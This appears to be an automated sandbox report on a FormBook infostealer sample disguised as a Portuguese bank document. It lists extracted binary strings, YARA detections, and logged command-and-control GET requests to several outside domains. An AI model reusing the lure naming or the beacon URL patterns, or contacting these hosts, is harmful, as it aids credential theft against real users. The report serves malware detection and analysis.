          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 May 2022 12:10:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://aka.ms/msal-net-iwa
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://aka.ms/valid-authorities
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJurn:oasis:names:t
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueWhttp://schemas.xmlsoap.org/ws/2005/02/trustsht
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicyOhttp://schemas.xmlsoap.org/wsdl/soap12/OSeriali
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: Document de bancobpi_66473474.exeString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/adal_token_
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/adal_token_ca
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/adal_token_cache_serialization
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-brokers
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-brokers.
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-client-apps
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-interactive-android
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-2-released)
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-3-breaking-changes
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change)
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changea
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changeu
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-4x-cache-breaking-change
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-4x-cache-breaking-changeZ
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-4x-cache-breaking-changeu
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-appl
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-applic
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-application-configuration
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-b2c
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-brokers
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-cli
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-client-credentials
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-cus
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-custom
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-custom-instance-metadata
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-custom-web-uiVCustomWebUi
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-device-code-flo
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-device-code-flow
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/msal-net-enable-keychai
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-enable-keychain-access
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-enable-keychain-groups
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-invalid-client
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-ios-broker
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-iwa
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-os-browser
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-os-browserxAuthorize
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-system-browsers
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-up
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/msal-net-up)
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/n
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/net-cache-p
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/net-cache-pe
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://aka.ms/net-cache-persistenc
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/net-cache-persistence-errors.
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.msa/msal-net-3x-cache-breaking-change
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://enterpriseregistration.windows.net/
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://login.chinacloudapi.cn
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://login.microsoftonline.com
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com/common
          Source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com/common/
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com/common/NBegin
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://login.microsoftonline.com/common/oauth2/nativeclient
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/nativeclient3urn:ietf:wg:oauth:2.0:oob
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com=https://login.chinacloudapi.cnAhttps://login.microsoftonline.deAht
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://login.microsoftonline.de
          Source: Document de bancobpi_66473474.exeString found in binary or memory: https://login.microsoftonline.us
          Source: Document de bancobpi_66473474.exe, 00000000.00000000.268776841.0000000000222000.00000020.00000001.01000000.00000003.sdmp, Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://sso2urn:ietf:wg:oauth:2.0:oobxhttps://login.microsoftonline.com/common/oauth2/nativeclient
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.307094907.0000000000222000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Microsoft.Identity.Json.Bson
          Source: unknownDNS traffic detected: queries for: www.wifitest.info
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=96p+z0lbCXEtn8r3kdhvhAjX1ASZK1voQ/JiiDcNf2/dHgDP8ab1TZBAgNzfa8Mh8PSm&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.rkhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=K6jUs0mpPBEML/5NzMDHXY6gxTSHaKTmmlbiXWC1vBmmOSfP0HM5UB/sQ7498az1yFs1&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.bathingsuitsshoppingus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=Dn2b2G7G/trQ3SmQOOzvZCyKhxwSo2sXwRlhdoEbpLnK/FZ0l0AAIUO0K0AUyG9Pn804&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.cthomassolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=sfi/U9uziz3yd+cIlnupVfxmGYoGEUQ+cvnH9JBY/zXkxzDvMNHWuq6jibpyEsrEd8HV&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.paulstilingroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.ponponshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Document de bancobpi_66473474.exe.4568448.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
          Source: 0.2.Document de bancobpi_66473474.exe.4568448.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
